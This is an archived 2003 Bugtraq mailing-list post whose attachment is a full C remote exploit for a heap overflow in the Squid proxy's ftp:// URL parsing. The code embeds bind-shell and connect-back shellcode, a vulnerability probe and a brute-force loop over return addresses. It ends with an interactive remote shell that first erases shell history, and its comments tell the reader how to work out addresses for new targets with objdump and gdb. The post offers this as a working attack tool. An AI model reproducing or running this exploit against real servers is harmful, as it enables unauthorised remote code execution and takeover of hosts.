105257 2003-06-18  21:42  /9 rader/ gunzip <techieone@softhome.net>
Importerad: 2003-06-18  21:42  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5255>
Ärende: old squid remote
------------------------------------------------------------
that's a one year old exploit against squid ftp:// parsing heap
overflow
-- 
                        _
ASCII ribbon campaign  ( )              www.eff.org
 - against HTML email   X          GPG key : pgp.mit.edu
             & vCards  / \        <techieone@softhome.net>
(105257) /gunzip <techieone@softhome.net>/(Ombruten)
Bilaga (text/x-csrc) i text 105258
Bilaga (application/pgp-signature) i text 105259
105258 2003-06-18  21:42  /726 rader/ gunzip <techieone@softhome.net>
Importerad: 2003-06-18  21:42  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5256>
Bilaga (text/plain) till text 105257
Ärende: Bilaga till: old squid remote
------------------------------------------------------------
/**
 ** *OLD* *OLD* *OLD* *OLD**OLD* *OLD**OLD* *OLD**OLD* *OLD**OLD* *OLD*
 **
 ** linux/x86 2.0 <= squid <= 2.4.DEVEL4 remote exploit (c) gunzip
 **
 ** to compile type 'make squidx'
 **
 ** Version 2.4STABLE(*) are vulnerable too but you have to play with
 ** USERLEN, NOPNUM, PASSLEN values to get exploit works (because of the
 ** different memory layout). Read below how to write new targets.
 **
 ** This is however a rare exploitable bug because
 **
 ** - Squid dies every time you overflow it and you have to wait > 10 sec
 ** - You can't bruteforce too much or squid will rest in peace forever
 ** - You MUST have the rights (acl) to use ftp proxying (not in default conf)
 ** - Address differs alot (return addresses) from distro to distro
 ** - Victim host must have an ftp server running to connect to
 ** - Yes, you can change the host who runs ftp server but in this way 
 **   you mess up the align so the exploit won't work (have to fix this) 
 **
 ** I'll put new versions if I've time on 
 ** http://members.xoom.it/gunzip/
 **
 ** comments to gunzip@ircnet - mAilto: <techieone@softhome.net>
 **
 ** TODO: check align against host field, make real targets
 **	
 ** Version 0.4
 **
 ** kisses to tankie
 ** greets: arcangelo, jestah, sorbo, and daphiel for testing
 **
 ** *OLD* *OLD* *OLD* *OLD**OLD* *OLD**OLD* *OLD* *OLD* *OLD* *OLD* *OLD*
**/
/**
 **  Here are the young men, well where have they been ?
 **/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <getopt.h>
char inetd_shellcode[] =
	/*
 	 * binds an inetd shell on port 5002 (lsd-pl.net + s-poly by zillion)
	*/
        "\x4b\xeb\x11\x5e\x31\xc9\xb1\x81\x80\x6c\x0e\xff\xd4\x80\xe9"
        "\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xbf\xf6\x2d\x05\x94"
        "\x24\x3c\x03\x03\x47\x3c\x3c\x03\x36\x3d\x42\x5d\xb7\x24\x3a"
        "\x3c\x01\x37\x5d\xbb\x24\x25\x2b\x27\x5d\xb5\x6d\x84\xdf\xa1"
        "\x54\xbc\xad\xd3\xd3\xd3\x39\x37\x3c\x43\xf4\x46\x3a\x39\xf4"
        "\x47\x48\x46\x39\x35\x41\xf4\x48\x37\x44\xf4\x42\x43\x4b\x35"
        "\x3d\x48\xf4\x46\x43\x43\x48\xf4\x03\x36\x3d\x42\x03\x47\x3c"
        "\xf4\x47\x3c\xf4\x01\x3d\x12\x03\x48\x41\x44\x03\x02\x4c\xf4"
        "\x0f\x03\x49\x47\x46\x03\x47\x36\x3d\x42\x03\x3d\x42\x39\x48"
        "\x38\xf4\x03\x48\x41\x44\x03\x02\x4c\x0f\x39\x37\x3c\x43\xf4"
        "\x4d\x39\x35\x3c";
char forking_bind[] = 
	/*
	 * by eSDee - www.netric.org, encoded with s-poly by zillion
	*/
        "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49"
        "\x41\x49\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0"
        "\x06\x9e\x26\x86\xdb\x26\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88"
        "\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95\x06\xb0\x25\x25\x25\x3b"
        "\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28\x88\xd7\x27"
        "\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
        "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b"
        "\xa2\x55\x5e\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85"
        "\x05\xa2\x55\x06\x95\x06\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85"
        "\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0\x85\xd7\xa2\x55\x0e\x98"
        "\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95\x06\x9e\x5e"
        "\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
        "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37"
        "\x3e\x43\x5e\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2"
        "\x55\x06\x95\x15\xa2\x55\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0"
        "\x6e";
#define IP           	"\x7f\x01\x01\x01"      /* 127.1.1.1 */
#define DPORT       	"\x99\x99"              /* 39321 */
char connectback_shellcode[] =
	/*
 	 * by gloomy - www.netric.org
 	*/
        "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x75\x54"
        "\x50\x40\x50\x40\x50\x89\xe1\x43\xb0\x66\xcd\x80"
        "\x4b\x53\x53\x68" IP "\x66\x68"  DPORT "\xb3\x02"
        "\x66\x53\x89\xe2\xb3\x10\x53\x52\x50\x89\xe1\xb3"
	"\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x75\x23\xb1"
	"\x02\xb0\x3f\xcd\x80\x49\x75\xf9\xb0\x3f\xcd\x80"
        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
	"\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x31\xc0"
        "\x40\xcd\x80";
#define	CONNECT_BACK	0x1
#define	CONNECT_TO	0x10
#define IP_OFFSET 	28
#define PORT_OFFSET	34
struct hits
{
	char		* desc  ;
	char 		* code 	;
	unsigned short	flag 	;
	unsigned short	port 	;
} ht[]=
{
        { "forking bind shellcode (45295)", forking_bind,
                CONNECT_TO, 45295 },
	{ "binds a shell via inetd (5002)", inetd_shellcode, 
		CONNECT_TO, 5002 },
	{ "connects back on supplied host (39321)", connectback_shellcode, 
		CONNECT_BACK, 39321 },
	{ NULL, 0, 0 }
};
#define TIMEOUT		0x5
#ifndef INADDR_NONE
#define INADDR_NONE	0xffffffff
#endif
#ifndef INADDR_ANY
#define INADDR_ANY	0x00000000
#endif
#ifdef DEBUG
#define debug(x...) printf(x)
#else
#define debug(x...) 
#endif 
/**
 ** a little rip from teso fmtlib
 **/
#define OCT( b0, b1, b2, b3, addr )  { \
             b0 = (addr >> 24) & 0xff; \
             b1 = (addr >> 16) & 0xff; \
             b2 = (addr >>  8) & 0xff; \
             b3 = (addr      ) & 0xff; \
}
void shell( int fd )
{
        int rd ;
        fd_set rfds;
        static char buff[ 1024 ];
        char INIT_CMD[] = "unset HISTFILE; echo; id; uname -a;\n";
        if (write(fd, INIT_CMD, strlen( INIT_CMD )) < strlen(INIT_CMD)) {
		fprintf(stderr,"[-] Error sending evil commands");
		exit( EXIT_FAILURE );
	}
        while(1) {
                FD_ZERO( &rfds );
                FD_SET(0, &rfds);
                FD_SET(fd, &rfds);
                if(select(fd+1, &rfds, NULL, NULL, NULL) < 1) {
                        perror("[-] Select");
                        exit( EXIT_FAILURE );
                }
                if( FD_ISSET(0, &rfds) ) {
                        if( (rd = read(0, buff, sizeof(buff))) < 1) {
                                perror("[-] Read");
                                exit( EXIT_FAILURE );
                        }
                        if( write(fd,buff,rd) != rd) {
                                perror("[-] Write");
                                exit( EXIT_FAILURE );
                        }
                }
                if( FD_ISSET(fd, &rfds) ) {
                        if( (rd = read(fd, buff, sizeof(buff))) < 1) {
                                exit( EXIT_SUCCESS );
                        }
                        write(1, buff, rd);
                }
        }
}
unsigned long resolve( char * host )
{
	unsigned long 	rev ;
	struct hostent 	* he ;
	if (( rev = inet_addr( host )) != INADDR_NONE ) 
	{	
		return rev ;	
	}
	if ( (he = gethostbyname( host )) == NULL )  
	{
        	perror("[-] Gethostbyname");
                return -1;
    	}
	else
	{
               	return ((struct in_addr *)(he->h_addr))->s_addr ;
	}
}
int connect_to_host( unsigned long ip, unsigned short port )
{
	
	int	ret, flags, s ;
        struct  sockaddr_in     server ;
	memset( &server, 0x0, sizeof(server) );
        server.sin_port = htons ( port );
        server.sin_family = AF_INET ;
	server.sin_addr.s_addr = ip ;
        if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1 ) {
                perror("[-] Socket");
		return -1 ;
        }
        /**
         ** sets non blocking socket and connects, ripped somewhere
        **/
        if ((flags = fcntl (s, F_GETFL, 0)) == -1 ) {
                close( s );
                return -1;
        }
        if (fcntl(s, F_SETFL, flags | O_NONBLOCK) == -1) {
                close( s );
                return -1;
        }
        ret = connect(s, (struct sockaddr *)&server, sizeof(server));
	if ( ret < 0 )
	{
		if ( errno != EINPROGRESS ) {
                	close( s );
                	return -1;
        	}
		else
		{
                	int                     n ;
                	struct timeval          tv = { TIMEOUT, 0 };
                	fd_set                  rset, wset;
                	FD_ZERO( &rset );
                	FD_ZERO( &wset );
                	FD_SET( s, &rset );
                	FD_SET( s, &wset );
               		if ((n = select( s + 1, &rset, &wset, NULL, &tv)) == -1 ) {
				perror("[-] Select");
				return -1;
			}
			/** 
		 	 ** handles timeout 
			 **/
                	if (n == 0) {
                        	close( s );
                        	fprintf(stderr,"[-] Timeout\n");
				return -1;
                	}
       			if (FD_ISSET( s, &rset ) || FD_ISSET( s, &wset ))
         		{
                 		int error = 0 ;
                 		int len = sizeof( error );
                 		if (getsockopt(s, SOL_SOCKET, SO_ERROR, &error, &len) == -1) {
					perror("[-] Getsockopt");
                        		return -1;
                 		}
                 		if (error != 0) {
					debug("[*] SO_ERROR != 0\n"); 
					return -1;
				}
			}
			else
			{
				return -1 ;
			}
		}
	}
        /**
         **      restores flags and returns
         **/
        if ( fcntl(s, F_SETFL, flags) == -1 )
                return -1;
        else 
		return s;
}
size_t net_write( int fd, char * buf, size_t size )
{
	struct timeval	tv = { TIMEOUT, 0 };
	fd_set		wfds ;
	int		ret ;
	FD_ZERO( &wfds );
	FD_SET( fd, &wfds );
	if ( (ret = select( fd+1, NULL, &wfds, NULL, &tv )) == -1 ) {
		perror("[-] Select");
		exit( EXIT_FAILURE );
	}
	if ( ret == 0 ) {
		close( fd );
		fprintf(stderr,"[-] Timeout\n");
		exit( EXIT_FAILURE );
	}
	if ( FD_ISSET( fd, &wfds ) ) 
	{
		return( write( fd, buf, size ) );
	}	
	else
	{
		fprintf(stderr,"[-] Error in sending data\n");
		exit( EXIT_FAILURE );		
	}
}
size_t net_read( int fd, char * buf, size_t size )
{
        struct timeval  tv = { TIMEOUT, 0 };
        fd_set          rfds ;
        int             ret ;
        FD_ZERO( &rfds );
        FD_SET( fd, &rfds );
        if ( (ret = select( fd+1, NULL, &rfds, NULL, &tv )) == -1 ) {
                perror("[-] Select");
                exit( EXIT_FAILURE );
        }
        if ( ret == 0 ) {
                close( fd );
                fprintf(stderr,"[-] Timeout\n");
                exit( EXIT_FAILURE );
        }
        if ( FD_ISSET( fd, &rfds ) )
        {
		return( read( fd, buf, size ) );
        }
        else
        {
                fprintf(stderr,"[-] Error in sending data\n");
                exit( EXIT_FAILURE );
        }
}
char * make_connback_shellcode(	const char * hellcode, 
				unsigned long ip,
				unsigned short port,
				int ip_offset,
				int port_offset )
{
	/** 
	 ** ip and port MUST be in host byte order
 	**/
	char a, b, c, d;
        char * hell = (char *)strdup( hellcode );
	fflush( stderr );
	if ( !hell ) {
		fprintf( stderr, "[-] Out of memory !\n");
		exit( EXIT_FAILURE );
	}
	debug("[*] Using ip=0x%.8x port=%d\n", (unsigned int)ip, port );
	/**
	 ** can't contain 0x0a and 0x0d too !!
	**/
	OCT( a, b, c, d, ip );	
	if  ( 	( !a || !b || !c || !d ) ||
		(( a == 0xa )||( b == 0xa )||( c == 0xa )|| ( d == 0xa ))||
                (( a == 0xd )||( b == 0xd )||( c == 0xd )|| ( d == 0xd )) )
	{
		fprintf(stderr, "[-] Ip contains invalid byte(s) that can't be in the shellcode\n"
				"[-] Change ip/shellcode and retry.\n"); 
		exit( EXIT_FAILURE );
	}
	if (    ( !(port & 0xff ) || !(port & 0xff00 )) ||
		( (( port & 0xff )== 0xa ) || (( port & 0xff00 )== 0xa )) ||
		( (( port & 0xff )== 0xd ) || (( port & 0xff00 )== 0xd )) ) 
	{
		fprintf(stderr, "[-] Port contains invalid byte(s) that can't be in the shellcode\n"
				"[-] Change bindport/shellcode and retry.\n");
		exit( EXIT_FAILURE );
	} 
        *(unsigned long  *)( hell + ip_offset   ) = htonl( ip );
        *(unsigned short *)( hell + port_offset ) = htons( port );
	return hell; 
}
/**
 ** if you have time to add real targets send me them, 
 ** I'll return to you the xpl with all new targets and fixes
**/
#define NOPNUM		800
#define USERLEN		11
#define PASSLEN		28
#define URLLEN		24
#define SMARTJUMP	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#define MASK		0x7
#define BRUTE_START ( 0x346000 + tg[n].retloc )
#define BRUTE_END   ( 0x366000 + tg[n].retloc ) 
#define PORT	3128
#define DELAY	12
#define	request2size(req) ( req += (sizeof( size_t ) + MASK) &~ MASK )
/**
 ** retloc : 
 **     echo 0x`objdump -R /usr/sbin/squid | grep write | awk '{print $1}'`
 **
 ** retaddr: 	
 **	gdb squid `pidof squid` then on another console run the exploit
 **     wait for squid to segfault, if it segfaults to an address like
 **	0x08041XXX then you just have to look for nopcode just at 
 ** 	0xRETLOC + 346000 (nops look like 0xeb27eb27)
 **
 ** 	ie. if your retloc is 0x080bb1f8 then just do something like 
 **	(gdb) x/100000x 0x080bb1f8+345000
 **
 ** padding: 
 ** 	if squid does not segfault on an address like 0x08XXXXXX
 **	then you have to play with lenght of password, user or url
 **/
struct options
{
	char		* 	desc 	;
	unsigned long		retaddr ;
	unsigned long		retloc	;
} tg[]=
{
	{ "2.4.DEVEL4 - Debian 3.0 from src" , 0x08401ba4, 0x080bb1f8 },
	{ "2.3STABLE5 - Debian 3.0 from src" , 0x0841982c, 0x080b80a8 },
	{ NULL, 0, 0 }
};	
void usage( char * a )
{
        fprintf( stderr, "Usage: %s -v victim [options]\n\n"
        "-v\tvictim ip or fqhn\n"
        "-p\tport to connect to (default 3128)\n"
	"-f\tdoes not check if host is vulnerable (forces exploit)\n"
	"-j\tjust check if host is vulnerable\n"
	"-i\tip address for connect back shellcode\n"
	"-P\tport of connect back shellcode\n"
        "-t\tone of the targets (for a list type -t X)\n"
	"-c\tone of the shellcodes (for a list type -c X)\n"
	"-b\tbruteforce mode\n"
	"-s\tstep for bruteforce\n"
	"-d\tdelay between attacks (12 secs default)\n"
	"-n\tnumber of nops (try 800, 1024, 1500, 2068)\n"
        "-r\treturn address (shellcode address)\n"
        "-g\taddress to be overwritten\n\n", a );
	exit( EXIT_FAILURE );
}
void show_target_list()
{
	int i;
        fprintf( stderr, "[+] TARGETS:\n\n");
        for (i = 0 ; tg[ i ].desc ; i++ )
                fprintf ( stderr, " %d - %s\n", i, tg[ i ].desc);
        printf("\n");
	exit( EXIT_FAILURE );
}
void show_code_list()
{
	int i;
        fprintf( stderr, "[+] SHELLCODES\n\n");
        for (i = 0 ; ht[ i ].desc ; i++ )
                fprintf ( stderr, " %d - %s\n", i, ht[ i ].desc   );
        printf("\n");
        exit( EXIT_FAILURE );
}
int squid_check_if_vuln( unsigned long ip, char * host )
{
        int     s ;
        char    buf[ 1024 ];
        char    pad[ 64 ];
	memset( buf, 0x0, sizeof(buf) );
        memset( pad, 0x7e, sizeof(pad) );
	pad[ 63 ]  =0;
        snprintf( buf, sizeof(buf) - 1, 
		"GET ftp://%s:%s@%s/ HTTP/1.0\r\n\r\n", 
		pad, pad, host );
	buf[ 1024 - 1 ] =0;
        if ( (s = connect_to_host( ip, 3128 )) == -1 )
                return 0;
        if (net_write( s, buf, strlen(buf) ) == strlen(buf)) {
                memset( buf, 0x0, sizeof(buf) );
                if( net_read( s, buf, sizeof(buf)) > 0 ) {
                        close( s );
                        return 0;
                }
                else  {
			close( s );
                        return 1;
		}
        }
        close( s );
        return 0;
}
/**
 ** every leeto exploit MUST have dots in it
**/
void wait_dots( int s )
{
	int i;
	fprintf( stdout, "[+] Sleeping %d secs to let squid restart",
s);
	for ( i=0; i <= s ; i++ ) 
	{
        	fflush( stdout );
                fprintf(stdout, ".");
                sleep( 1 );
 	}
	fprintf( stdout, "\n" );
}
int main(int argc, char *argv[])
{
	unsigned long 	ip 		= 0x7f000001, 
			local_ip	= 0x0, 
			retaddr 	= 0x0;
        unsigned int	len, i, 
			step 	= NOPNUM - 256,
			nopnum 	= NOPNUM, 
			delay 	= DELAY;
	unsigned short	port 	= PORT ;
	int	opt, s, n =0, c =0, brute =0, force =0;
	char	user [ 128 ];
	char 	pass [ 128 ]; 
	char    url  [ 128 ];
        char    evil [ 4096 ];
	char 	nops [ NOPNUM ];
	char 	* t ;
	char 	* host 		= "0.0.0.0" ;
        char    * victim 	= "127.0.0.1";
 
	fprintf(stdout, "\nlinux/x86 remote exploit against squid <=
2.4.STABLE3 by gunzip\n\n");
	if ( argc < 3 )
		usage( argv[0] );
        while ((opt = getopt(argc, argv, "n:d:i:P:jfp:c:t:v:r:g:bs:h")) != EOF) {
                switch(opt)
                {
			case 'd': delay = atoi(optarg); break;
			case 'n': nopnum = atoi(optarg); break;
			case 'i': local_ip = inet_addr(optarg); break;
			case 'P': ht[c].port = atoi(optarg); break;
			case 'f': force=1; break;
			case 'j': force=-1; break;  
			case 'p': port = atoi(optarg) ;
			case 'c': if ( *optarg == 'X' ) show_code_list();
				  else c = atoi(optarg); break;  
			case 't': if ( *optarg == 'X' ) show_target_list();
				  else n = atoi(optarg); break;
			case 'v': victim = strdup( optarg ); break ;
			case 'r': tg[n].retaddr = strtoul( optarg, NULL, 16 ); break ;
			case 'g': tg[n].retloc = strtoul( optarg, NULL, 16 ); break ;
			case 'b': brute=1; break;
			case 's': step=atoi(optarg); break;
			case 'h': default: usage( "./squidx" ); break;
		}	
	}
	if ( ht[c].port > 65535 || ht[c].port < 1 ) {
		fprintf(stderr, "[-] Not valid port for connect back code\n");
		return -1;
	}
        if ( ht[c].flag & CONNECT_BACK ) {
		if ( !local_ip || local_ip == -1 ) {
			fprintf(stderr,"[-] You must supply a valid ip for connect back shellcode.\n");
			return -1;
		} 
                ht[c].code = make_connback_shellcode( 	ht[c].code,
                                                	ntohl( local_ip ),
                                                	ht[c].port,
                                                	IP_OFFSET,
                                                	PORT_OFFSET
		);
	}
	if ( (ip = resolve( victim )) == -1 ) {
		fprintf(stderr, "[-] Cannot resolve victim ip\n");
		return -1;
	}
	if ( !force ) {
		if ( squid_check_if_vuln( ip, host ) )
			fprintf(stdout, "[+] Host seems vuln !\n");
		else {
			fprintf(stderr, "[-] Host seems not vuln, sorry.\n");
			return -1;
		}
		if ( force == -1 ) 
			return 1;
		wait_dots( 12 );
	}
	fprintf(stdout,"[+] Target %s\n", tg[n].desc);
	fprintf(stdout,"[+] Host is %s\n", victim );
	/**
         ** this is for align and overflow
         **/
    	memset( user, 0x7e, USERLEN );
     	user[ USERLEN ] = 0;
    	memset( pass, 0x7e, PASSLEN );
    	pass[ PASSLEN  ] = 0 ;
	len = 64 + strlen( user ) + strlen( pass ) + strlen( host ) +
	URLLEN; t = (char *)malloc( len );
	memset( evil, 0x00, sizeof(evil));
	memset( nops, 0xeb, sizeof(nops));
	memset( url, 0x41, sizeof(url));
        /**
         ** that's because 0x27 act as a nop
         **/
	for ( i=1; i < sizeof(nops) ; i+=2 )
		nops[ i ] = 0x27 ;
	nops[ nopnum - strlen(ht[c].code) - 8 ] = 0 ;
	snprintf( evil, sizeof(evil)-1, "Accept: %s%s%s\r\n\r\n",
nops, SMARTJUMP, ht[c].code);
	for ( retaddr=(brute ? BRUTE_START : tg[n].retaddr ); retaddr <= (brute ? BRUTE_END : tg[n].retaddr ); retaddr += step )
	{
		memset( t, 0x0, len );
		fprintf(stdout,"[+] Using retaddr=0x%.8x retloc=0x%.8x code=%d step=%d\n", 
				(u_int)retaddr, (u_int)tg[n].retloc, 
				strlen(ht[c].code), step); 
		*(long *)&url[0] 	= 0x4142432f  		; /* dummy 	*/
		*(long *)&url[4] 	= 0xfffffffc  		; /* prevsize 	*/	
		*(long *)&url[8]	= 0xfffffffc  		; /* size field */ 
		*(long *)&url[12]	= 0xdeadbeef  		; /* dummy  	*/  
		*(long *)&url[16]	= tg[n].retloc - 12 	; /* fd		*/
		*(long *)&url[20] 	= retaddr		; /* bk		*/
		url[ URLLEN ] = 0 ;
		debug("[*] Using host=%d user=%d url=%d pass=%d\n", 
			strlen(host), strlen(user), 
			strlen(url), strlen(pass));
        	debug("[*] Using buffer_len=%d real_malloced_size=%d\n", 
			len, request2size( len ));
		strcat( t, "GET " );
        	strcat( t, "ftp://" );
		strcat( t, user ); 
		strcat( t, ":" );
		strcat( t, pass );
		strcat( t, "@" ); 
		strcat( t, host );
		strcat( t, url );
		strcat( t, " HTTP/1.0\r\n" );
		debug("[*] Using string=%d evil=%d\n", strlen(t),
strlen(evil));
		if ( (s = connect_to_host( ip, 3128 )) == -1 ) {
			fprintf(stderr, "[-] Could not connect to host %s\n", victim );
			return -1;
		}
		net_write( s, t, strlen(t) );
		net_write( s, evil, strlen(evil) );
		if (( brute ) && !(brute++ % 5) )
			wait_dots( 22 );
		else 
			wait_dots( 12 );
		close( s );
		sleep( 1 );
		if ( ht[c].flag & CONNECT_TO )  
		{
			int y = connect_to_host( ip, ht[c].port );
			fprintf( stdout, "[+] Trying connecting to the backdoor\n");
			if ( y > 0 ) shell( y );
		}
		fprintf(stdout, "[+] I did not work.\n");
	}
	return 1;
}
		/* http://members.xoom.it/gunzip/ */
(105258) /gunzip <techieone@softhome.net>/(Ombruten)
105259 2003-06-18  21:42  /9 rader/ gunzip <techieone@softhome.net>
Importerad: 2003-06-18  21:42  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5257>
Bilaga (text/plain) till text 105257
Ärende: Bilaga till: old squid remote
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE+8MA2ylsWt+FfX4ARAvHYAJ9cbHypikK/6yA8PnoNdBQMKm6BBwCcC07U
+X50j3IV9R3E+uKzaAbimEI=
=FM7v
-----END PGP SIGNATURE-----
(105259) /gunzip <techieone@softhome.net>/----------